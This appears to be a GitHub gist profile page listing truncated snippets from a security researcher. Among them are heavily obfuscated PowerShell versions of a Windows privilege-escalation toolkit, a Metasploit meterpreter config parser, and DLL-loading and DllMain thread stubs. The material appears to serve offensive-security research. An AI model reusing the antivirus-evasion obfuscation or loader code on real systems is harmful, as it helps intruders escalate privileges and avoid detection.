Skip to content

Instantly share code, notes, and snippets.

View plowsec's full-sized avatar

volodya plowsec

96 followers · 50 following
View GitHub Profile
@plowsec
plowsec / symbolic_init_state.py
Created June 26, 2019 07:28
Attempt to dump symbolic constraints on registers after executing a few select instructions.
from angr import options
import angr
addr_main = 0x08049574
addr_end_alu_eq = 0x08049657
addr_end_load_jmp_regs = 0x08049731
proj = angr.Project("bin/test_mov_strip.bin", auto_load_libs=False)
main = proj.factory.block(addr_main) # unused
@plowsec
plowsec / pwrup.ps1
Created July 8, 2019 14:29
pwrup.ps1
function conglomerated
{
Param
(
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
)
$XFJbzEkH99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
@plowsec
plowsec / pwrups.ps1
Last active July 9, 2019 08:11
Test
${U`H`TiV}=[tYPE]("{0}{1}" -F'gUI','D'); &("{1}{0}"-f 'T','SE') ("6"+"Lox"+"fI") ( [TYpE]("{1}{0}{5}{3}{2}{4}" -F'LECT','REf','AsSemB','n.','ly','Io') ) ; ${xsW`yuo}=[tyPE]("{6}{1}{0}{4}{2}{3}{5}{7}" -F'.INt','IMe','oPSEr','vicES.','Er','CAllinG','RUnt','CONvENtioN') ; ${5q`6x9} = [TyPE]("{5}{3}{0}{7}{2}{4}{1}{6}"-F 'ErViCE','Rse','.','UNtime.iNTeROPS','CHA','r','T','s') ; &("{0}{3}{1}{2}" -f 'S','ArIA','BLE','et-v') ("LR1u"+"sm") ( [TypE]("{10}{2}{7}{9}{4}{5}{8}{0}{6}{1}{3}" -F'viCEs.DLLiMpORTat','iB','ime.IN','uTe','oPS','e','tr','TE','r','R','runT')) ; &('Sv') ("{0}{1}" -f '0pl','8') ( [TYpE]("{3}{1}{0}{2}"-f'r','lagsATt','IbUTe','F') ); &('sv') ("{1}{0}"-f'E','wCB') ([TyPE]("{1}{4}{0}{3}{2}{5}"-f 'CtIOn.em','R','.PaCkinGsiZ','It','EflE','e')); &("{0}{1}{2}"-f'set','-It','EM') ('Va'+'rIAb'+'LE:'+'wG5'+'r') ( [tYpe]("{5}{6}{7}{1}{4}{0}{3}{2}" -f'TtR','tI','bUtEs','I','On.tyPeA','rE','fl','EC')); &("{2}{1}{0}" -f'LE','eT-varIAB','s') ("{1}{0}"-f 'M','C1j') ( [tyPE]("{0}{4}{5}{1}{7}{3}{2}{
@plowsec
plowsec / toto2.ps1
Created July 9, 2019 09:31
adadasdadasdada
function New-InMemoryModule
{
<#
.SYNOPSIS
.DESCRIPTION
@plowsec
plowsec / pwrups_v2
Created August 26, 2019 15:31
pwrup_v2
Add-Type @"
[System.FlagsAttribute]
public enum ServiceAccessFlags : uint
{
CC = 1,
DC = 2,
LC = 4,
SW = 8,
RP = 16,
WP = 32,
@plowsec
plowsec / metsrv_config.ksy
Last active May 26, 2020 12:04
Katai struct for MetsrvConfig
meta:
id: mtp
file-extension: mtp
seq:
- id: handle
size: 8
- id: exit_func
type: u4le
- id: expiry
type: s4le
@plowsec
plowsec / test_loadlib.c
Created May 26, 2020 12:05
#include <stdio.h>
#include <windows.h>
int main()
{
HRESULT hResult;
HMODULE hModule = LoadLibraryA("test.dll");
if (hModule == NULL) {
printf("meeeeh\n");
@plowsec
plowsec / dllmain.c
Created May 26, 2020 12:06
Quick and dirty dll main
void main_dll(){
toto();
}
BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
if (reason != DLL_PROCESS_ATTACH)
return TRUE;
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main_dll, NULL, 0, NULL);
@plowsec
plowsec / readfile.cpp
Created May 26, 2020 12:07
Read a file with the Win32 API
void read_file(char* path, PBYTE buffer, size_t bufsize, DWORD* size_read) {
HANDLE hFile;
hFile = CreateFileA(path, // file to open
GENERIC_READ, // open for reading
FILE_SHARE_READ, // share for reading
NULL, // default security
OPEN_EXISTING, // existing file only
FILE_ATTRIBUTE_NORMAL, // normal file
@plowsec
plowsec / python parse html
Last active July 6, 2020 08:34
import requests
from lxml import html
burp0_url = ""
burp0_cookies = {}
burp0_headers = {}
g_proxy = "127.0.0.1:8080"
http_proxy = f"http://{g_proxy}"
https_proxy = f"https://{g_proxy}"
ftp_proxy = f"ftp://{g_proxy}"